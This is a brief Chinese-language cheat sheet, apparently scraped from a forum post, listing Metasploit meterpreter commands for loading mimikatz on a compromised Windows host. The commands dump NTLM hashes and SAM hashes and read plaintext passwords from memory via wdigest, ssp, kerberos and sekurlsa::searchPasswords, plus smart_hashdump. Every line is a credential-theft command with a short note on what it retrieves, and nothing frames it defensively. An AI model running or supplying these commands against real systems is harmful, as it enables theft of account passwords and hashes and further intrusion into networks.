- meterpreter > load mimikatz
- meterpreter > help
- meterpreter > msv 获取的是hash值
- meterpreter > ssp 获取的是明文信息
- meterpreter > wdigest 读取内存中存放的账号密码明文信息
- meterpreter > kerberos
复制代码
mimikatz_command 运行自定义命令
- meterpreter > mimikatz_command -f a:: 输入一个错误的模块,可以列出所有模块
- meterpreter > mimikatz_command -f samdump:: 可以列出samdump的子命令
- meterpreter > mimikatz_command -f samdump::hashes
- meterpreter > mimikatz_command -f handle::list 列出应用进程
- meterpreter > mimikatz_command -f service::list 列出服务
- meterpreter > mimikatz_command -f sekurlsa::searchPasswords
- meterpreter > run post/windows/gather/smart_hashdump 获取hash
复制代码
|